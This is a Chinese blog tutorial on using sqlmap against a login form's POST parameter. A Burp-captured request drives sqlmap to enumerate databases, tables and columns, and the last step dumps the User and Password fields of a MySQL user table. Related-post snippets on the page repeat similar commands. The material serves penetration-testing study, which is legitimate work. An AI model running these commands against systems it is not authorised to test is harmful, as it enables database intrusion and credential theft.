Sqlmap————5、POST注入

最新推荐文章于 2024-02-27 20:47:37 发布
最新推荐文章于 2024-02-27 20:47:37 发布
阅读量1.2k 收藏 3
点赞数
分类专栏: # SQLmap 【渗透工具】
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Fly_hps/article/details/80198579
版权

具体流程:

(1)浏览器打开目标地址http:// www.xxx.com /Login.asp

(2)配置burp代理(127.0.0.1:8080)以拦截请求

(3)点击login表单的submit按钮

(4)这时候Burp会拦截到了我们的登录POST请求

(5)把这个post请求复制为txt, 我这命名为test.txt 然后把它放至sqlmap目录下

(6)运行sqlmap并执行如下命令:

1、列数据库:

sqlmap -r  test.txt  -p  username  –dbs

注:-r表示加载一个文件,-p指定参数

2、选择一个数据库列表名

 Sqlmap -r  test.txt -p username -D mysql –tables

3、猜列名

Sqlmap -r test.txt -p username -D mysql -T user –columns

4、猜字段名

sqlmap -r test.txt -p username -D mysql -T user -C “User,Password” –dump

FLy_鹏程万里
关注
  • 0
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
sqlmap注入漏洞测试
02-22
资源内容:sqlmap注入漏洞测试
利用sqlmap进行POST注入
热门推荐
lwpoor123的博客
12-24 12万+
利用sqlmap进行POST注入,常见的有三种方法: 注入方式一: 1.用Burp抓包,然后保存抓取到的内容。例如:保存为post.txt,然后把它放至某个目录下 2.列数据库: sqlmap.py -r "c:\Users\fendo\Desktop\post.txt" -p n --dbs 注:-r表示加载一个文件,-p指定参数 其中出现了三次提示: it looks l...
使用sqlmap 对接口进行json格式参数传入
cagezxy的博客
09-30 4750
sqlmap进行注入时,如果接口post方式,body是json方式时,有2种方式 方式1:文件方式 可以通过burp suite 来抓 接口请求的数据,将数据保存到 文件中。 然后使用 sqlmap来执行注入,举例: python .\sqlmap.py -r "C:\Users\gal\Desktop\getdetail.txt" 当然也可以通过 postman 当中将请求转换成 http请求方式,将数据保存到文件中。 举例: 拷贝 请求内容,保存到文件 方式2:sqlmap --data参数 正
sql注入post 传参方式的注入
没有故事
02-27 536
sqlmap -r ./sqlmapfile(-r 捕获的请求文件及其所在位置) -p id(加入指定参数) --cookie=""先将post请求在burp捕获,将抓到的请求内容保存到文件中,在sqlmap安装 目录下面新建文本文件为x.txt。是否存在注入点,注入点在有和数据库服务器交互的地方。加入-p 指定参数 -p id。在输入框里面进行注入
利用sqlmap进行post注入学习笔记
weixin_52034407的博客
03-19 2843
使用sqlmap进行post注入学习笔记
利用sqlmap进行post注入(实操)
peanut5036的博客
12-23 3621
SQL注入攻击指的是通过特殊的输入作为参数拆入Web应用程序,而这些输入大都是SQL语法里的一些组合,通过执行SQL语句中进而执行攻击者所要的操作,起主要原因是程序没有细致地过滤用户输入的数据,致使非法数据入侵系统。 任何一个用户可以输入的位置都可能是注入点。比如url中,以及http报文中,POST传递的参数
sqlmap注入神器
12-30
sqlmap是一款注入神器,灵活的运作它将是你更有效率的完成工作
sqlmap sql 注入测试工具
最新发布
03-06
sqlmap 可以很方便的测试sql 注入 安装后直接使用
SQLmap注入工具
09-20
sqlmap是一个自动化的SQL注入工具,其主要功能是扫描,发现并利用给定的URL的SQL注入漏洞,目前支持的数据库是MySQL, Oracle, PostgreSQL, Microsoft SQL Server, Microsoft Access, IBM DB2, SQLite, Firebird, ...
SqlMap-Sql注入
08-02
Sqlmap是开源的自动化SQL注入工具,由Python写成,具有如下特点: 完全支持MySQL、Oracle、PostgreSQL、Microsoft SQL Server、Microsoft Access、IBM DB2、SQLite、Firebird、Sybase、SAP MaxDB、HSQLDB和Informix...
sqlmap——json注入
mingyqf的博客
11-12 3846
现在越来越多的网站开始使用 RESTFUL 框架,数据传输使用 JSON,那么这种情况下我们如何使用 SQLmap 进行自动化注入呢? 能使用 * 指定注入点吗? 先说结论:对于 JSON 数据的 SQL 注入使用 * 是错误的! 首先需要着重强调一下,网上有很多文章说可以使用*来指定注入点,但经过我的实测,SQLmap 发送的数据包会被强制转换为普通格式。 我们可以使用-vvv参数来查看 SQLmap 发送的测试数据: sqlmap -u https://www.example.com —data {“e
Sqlmap -- POST注入
weixin_41489908的博客
07-07 2622
想归想,难过归难过,若你岁岁平安,我可生生不见。。。 ---- 网易云热评 一、检测是否存在注入 1、通过BurpSuite抓包获取提交的数据 2、sqlmap -u "http://192.168.139.129/pikachu/vul/sqli/sqli_id.php" --data "id=1&submit=%E6%9F%A5%E8%AF%A2" --data指定提交的数据 运行结果:id值存在注入,可能是布尔盲注、报错注入、时间盲注、联合注入 [14:37:09]...
SQLMAP高级用法
你在看屏幕的同时,屏幕也在注视着你
12-19 2124
sqlmap高级用法
sql注入
leekos的博客,分享web安全相关知识~
12-06 1849
sql提交注入
Sqlmap 22.05.23.05
辉小鱼的博客
11-05 691
sqlmap is an open source penetration testing tool that automates the process of detecting and exploiting SQL injection flaws and taking over of database servers.
从零开始学习--sqlmap,socket 6月24日
qq_42184699的博客
06-24 218
SqlMapsqlmap官网:‘http://sqlmap.org/’sqlmap 需要 python2才能运行WAF:web应用防护,是通过一系列针对HTTP/HTTPS的安全策略专门为web应用提供保护的产品单词:current    现在的count       总数Pythonsocket()模块函数语法:socket.socket(socket_family, socket_type, ...
sqlmap注入教程 常用指令
qq_58000413的博客
06-29 1768
sqlmap一些指令
sqlmap post注入方法
09-20
sqlmap是一种常用的自动化SQL注入工具,可以用于测试和发现应用程序中的SQL注入漏洞。在使用post注入方法时,可以通过以下步骤进行操作: 1. 使用`-u`参数指定目标URL,例如:`-u "http://xxx.xxx.com/Login.asp"` ...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

FLy_鹏程万里

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值